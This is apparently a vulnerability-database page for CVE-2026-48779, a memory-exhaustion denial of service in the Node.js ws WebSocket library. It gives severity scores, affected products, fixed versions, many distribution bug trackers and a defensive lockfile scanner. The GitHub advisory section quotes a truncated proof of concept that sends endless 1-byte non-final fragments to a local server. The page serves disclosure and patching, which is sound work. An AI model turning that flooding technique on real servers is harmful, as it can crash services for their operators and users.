CVE-2026-48779
Published 2026-06-17
Priority P3 · 46 · high · 7.5 · CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS 0.73% · 49.4th percentile
ws is an open source WebSocket client and server for Node.js. All versions from 1.1.0 up to (but not including) 5.2.5, from 6.0.0 up to 6.2.4, from 7.0.0 up to 7.5.11, and from 8.0.0 up to 8.21.0 are affected by a memory exhaustion DoS vulnerability. A peer can send a high volume of exceptionally small fragments and data chunks, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM. This issue has been fixed in versions 5.2.5, 6.2.4, 7.5.11, and 8.21.0.
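To see which installed copies of ws fall inside the ranges above, the following added example (not code from the ws project or from any of the advisories) walks an npm lockfile and reports each affected copy with the release that fixes it. The function names and the sample lockfile are constructed for illustration, and the upper bound of every range is assumed to be exclusive because that version carries the fix.

```javascript
'use strict';

// Affected ranges as stated in the advisory text: [from, fixed).
// Assumption: each upper bound is exclusive because that version carries the fix.
const AFFECTED = [
  { from: '1.1.0', fixed: '5.2.5' },
  { from: '6.0.0', fixed: '6.2.4' },
  { from: '7.0.0', fixed: '7.5.11' },
  { from: '8.0.0', fixed: '8.21.0' }
];

// Parse "MAJOR.MINOR.PATCH[-prerelease][+build]" into a comparable form.
function parse(version) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.-]+)?(\+[0-9A-Za-z.-]+)?$/
    .exec(String(version).trim());
  if (!m) return null;
  return { nums: [Number(m[1]), Number(m[2]), Number(m[3])], pre: Boolean(m[4]) };
}

// Negative, zero or positive, like a sort comparator. Fields are compared as
// numbers (7.5.10 < 7.5.11), and a prerelease sorts before its release, so
// "8.21.0-rc.1" is treated as still unfixed.
function compare(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a.nums[i] !== b.nums[i]) return a.nums[i] - b.nums[i];
  }
  return Number(b.pre) - Number(a.pre);
}

// Returns the fixed version to move to, or null if the version is not affected.
// Throws on an unparseable version so a bad entry is never read as "safe".
function fixedVersionFor(version) {
  const v = parse(version);
  if (!v) throw new TypeError(`unparseable ws version: ${version}`);
  for (const range of AFFECTED) {
    if (compare(v, parse(range.from)) >= 0 && compare(v, parse(range.fixed)) < 0) {
      return range.fixed;
    }
  }
  return null;
}

// Walk the "packages" map of an npm lockfile (lockfileVersion 2 or 3) and
// report every affected copy of ws, including copies nested under other packages.
function findAffectedWs(lockfile) {
  const findings = [];
  for (const [path, entry] of Object.entries(lockfile.packages || {})) {
    if (path !== 'node_modules/ws' && !path.endsWith('/node_modules/ws')) continue;
    const fixed = fixedVersionFor(entry.version);
    if (fixed) findings.push({ path, version: entry.version, fixed });
  }
  return findings;
}

// Constructed sample lockfile; every package name other than ws is a placeholder.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', version: '1.0.0' },
    'node_modules/ws': { version: '8.21.0' },
    'node_modules/example-dep-a/node_modules/ws': { version: '7.5.10' },
    'node_modules/example-dep-b/node_modules/ws': { version: '6.2.4' },
    'node_modules/example-dep-c/node_modules/ws': { version: '5.2.4' }
  }
};

console.log(findAffectedWs(SAMPLE_LOCK));
```

Nested copies matter here: a patched top-level ws does not update the copy a transitive dependency pins for itself.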
Affected
74 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ansible-automation-platform-24 | lightspeed-rhel8 | — | — |
| ansible-automation-platform-25 | lightspeed-rhel8 | — | — |
| ansible-automation-platform-26 | gateway-rhel9 | — | — |
| ansible-automation-platform-26 | lightspeed-rhel9 | — | — |
| ansible-automation-platform-27 | gateway-rhel9 | — | — |
| ansible-automation-platform-27 | lightspeed-rhel9 | — | — |
| ansible-automation-platform | automation-portal | — | — |
| ansible-automation-platform | bootc-automation-portal-rhel9 | — | — |
| apache | thrift | — | — |
| container-native-virtualization | kubevirt-console-plugin | — | — |
| container-native-virtualization | kubevirt-console-plugin-rhel9 | — | — |
| cryostat | cryostat-openshift-console-plugin-rhel9 | — | — |
| debian | ceph | — | — |
| devspaces | code-rhel9 | — | — |
| devspaces | dashboard-rhel9 | — | — |
| discovery | discovery-ui-rhel9 | — | — |
| gatekeeper | gatekeeper-rhel9 | — | — |
| grafana | grafana | — | — |
| odf4 | mcg-core-rhel9 | — | — |
| odf4 | odf-console-rhel9 | — | — |
| openshift-lightspeed | lightspeed-console-plugin-419-rhel9 | — | — |
| openshift-lightspeed | lightspeed-console-plugin-pf5-rhel9 | — | — |
| openshift-lightspeed | lightspeed-console-plugin-rhel9 | — | — |
| openshift-pipelines | pipelines-console-plugin-pf5-rhel9 | — | — |
| openshift-pipelines | pipelines-console-plugin-rhel8 | — | — |
CVSS provenance
nvd · v3.1 · 7.5 · HIGH · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvelistv5 · v3.1 · 7.5 · HIGH · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
vendor_redhat · 7.5 · HIGH
Red Hat
ws: ws: Denial of Service via memory exhaustion from small WebSocket fragments
vendor_redhat·2026-06-16·CVSS 7.5
CVE-2026-48779 [HIGH] CWE-1050 ws: ws: Denial of Service via memory exhaustion from small WebSocket fragments
A flaw was found in ws, an open source WebSocket client and server. A remote attacker can expl
CVEList
ws: Memory exhaustion DoS from tiny fragments and data chunks
cvelistv5·2026-06-16·CVSS 7.5
CVE-2026-48779 [HIGH] CWE-400 ws: Memory exhaustion DoS from tiny fragments and data chunks
GHSA
ws: Memory exhaustion DoS from tiny fragments and data chunks
ghsa·2026-06-15
CVE-2026-48779 [HIGH] CWE-400 ws: Memory exhaustion DoS from tiny fragments and data chunks
### Impact
A high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM.
### Proof of concept
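```js
import { WebSocket, WebSocketServer } from 'ws';

// Local server on an ephemeral port; the client below connects to it.
const wss = new WebSocketServer({ port: 0 }, function () {
  const data = Buffer.alloc(1); // 1-byte payload per fragment
  // fin: false sends a non-final frame, so the receiver keeps the fragment
  // while it waits for the rest of the message.
  const options = { fin: false };
  const { port } = wss.address();
  const ws = new WebSocket(`ws://localhost:${port}`);

  ws.on('open', function () {
    (function send() {
      ws.send(data, options, function (err) {
        if (err) return;
        send();
      });
    })();
  });

  ws.on
```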
No detection rules found.
No public exploits indexed.
Bugzilla
CVE-2026-48779 thrift: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-48779 forgejo: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 jupyterlab: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 h3: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 pcs: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 dotnet8.0: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 ws: ws: Denial of Service via memory exhaustion from small WebSocket fragments
bugzilla·2026-06-16
Discussion:
There is no impact of this CVE on pcs-web-ui installations in prod
Bugzilla
CVE-2026-48779 python-ipyparallel: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 thrift: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 yarnpkg: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 qt6-qtwebengine: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 golang-github-apache-beam-2: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 python-jupytext: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 fbthrift: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 jupyterlab: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 openbao: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 yarnpkg: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 nodejs-aw-webui: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 fcitx5: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 cachelib: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 seamonkey: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Discussion:
SeaMonkey does not use npm ws now.
Bugzilla
CVE-2026-48779 fbthrift: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 openbao: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 magicmirror: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 seamonkey: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
Discussion:
SeaMonkey does not use npm ws now.
Bugzilla
CVE-2026-48779 magicmirror: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 qt5-qtwebengine: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 onnxruntime: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 python-jupyterlab_pygments: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 magicmirror-module-onthisday: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 python-jupyterlab_pygments: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 mozjs78: ws: Denial of Service via memory exhaustion from small WebSocket fragments [epel-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 rust: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 python-ipyparallel: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
Bugzilla
CVE-2026-48779 cachelib: ws: Denial of Service via memory exhaustion from small WebSocket fragments [fedora-all]
bugzilla·2026-06-16
https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7
https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53
https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94
https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8
https://github.com/websockets/ws/security/advisories/GHSA-96hv-2xvq-fx4p
https://access.redhat.com/errata/RHSA-2026:29197
https://access.redhat.com/errata/RHSA-2026:33155
https://access.redhat.com/errata/RHSA-2026:33160
https://access.redhat.com/errata/RHSA-2026:33163
https://access.redhat.com/errata/RHSA-2026:33173
https://access.redhat.com/errata/RHSA-2026:33183
https://access.redhat.com/security/cve/CVE-2026-48779
https://bugzilla.redhat.com/show_bug.cgi?id=2489661
https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-48779.json
Published: 2026-06-17